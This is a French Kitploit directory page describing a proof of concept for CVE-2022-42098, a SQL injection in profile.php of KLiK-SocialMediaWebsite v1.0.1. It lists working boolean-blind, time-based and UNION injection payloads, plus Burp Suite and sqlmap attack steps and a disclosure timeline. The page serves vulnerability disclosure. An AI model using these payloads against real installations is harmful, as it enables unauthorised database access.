Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-42098 — KLiK-SocialMediaWebsite v1.0.1 a des vulnérabilités d'injection SQL dans profile.php | Kitploit
Outils/GitHubGitHub/bypazs/cve-2022-42098
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubbypazs/cve-2022-42098

CVE-2022-42098

KLiK-SocialMediaWebsite v1.0.1 a des vulnérabilités d'injection SQL dans profile.php

Voir le dépôt
1il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

KLiK-SocialMediaWebsite version v1.0.1

Explication de la vulnérabilité :

KLiK-SocialMediaWebsite v1.0.1 possède des vulnérabilités d'injection SQL sur profile.php au paramètre id.

Vecteurs d'attaque :

KLiK-SocialMediaWebsite v1.0.1 Une fois qu'un utilisateur a été créé, il peut également trouver des personnes sur KLiK via la page KLiK Users. Le paramètre 'id' de profile.php peut être abusé pour injecter des requêtes SQL arbitraires.

Affecté :

  • http://ip_address/KLiK/profile.php?id=user_id
  • GET /KLiK/login.php

Charge utile :

root@kitploit:~
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=27 AND 3227=3227

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=27 AND (SELECT 3046 FROM (SELECT(SLEEP(5)))barN)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: id=-2373 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71787a7171,0x6d67676474624545784f564265735871415865575a4f72697053686d724768624969514c70754459,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL#

Testé sur :

  1. KLiK SocialMediaWebsite version v1.0.1 (https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1)

  2. Firefox version 105

  3. sqlmap version 1.6.7 stable

Étapes de l'attaque :

  1. Connectez-vous avec un nom d'utilisateur et un mot de passe.
  2. Cliquez sur l'icône représentant une personne dans le coin supérieur droit.
  3. Interceptez la requête en utilisant Burp Suite.
  4. Sélectionnez un individu depuis la page KLiK Users en cliquant sur son nom.
  5. Revenez à Burp Suite, sur /profile.php, faites un clic droit et sélectionnez "Copier dans un fichier".
  6. Envoyez le fichier de requête à Kali Linux et utilisez sqlmap avec.
  7. Vulnérabilité d'injection SQL découverte via id

Découvreur :

:shipit: Grim The Ripper Team par SOSECURE Thaïlande

Média :

Calendrier de divulgation :

  • 2022–09–28 : Vulnérabilité découverte.
  • 2022–09–28 : Vulnérabilité signalée à la société MITRE.
  • 2022–10–15 : CVE a été réservé.
  • 2022–10–31 : Divulgation publique de la vulnérabilité.

Reference:

  1. https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1

  2. https://github.com/msaad1999/KLiK-SocialMediaWebsite

Télécharger l’outil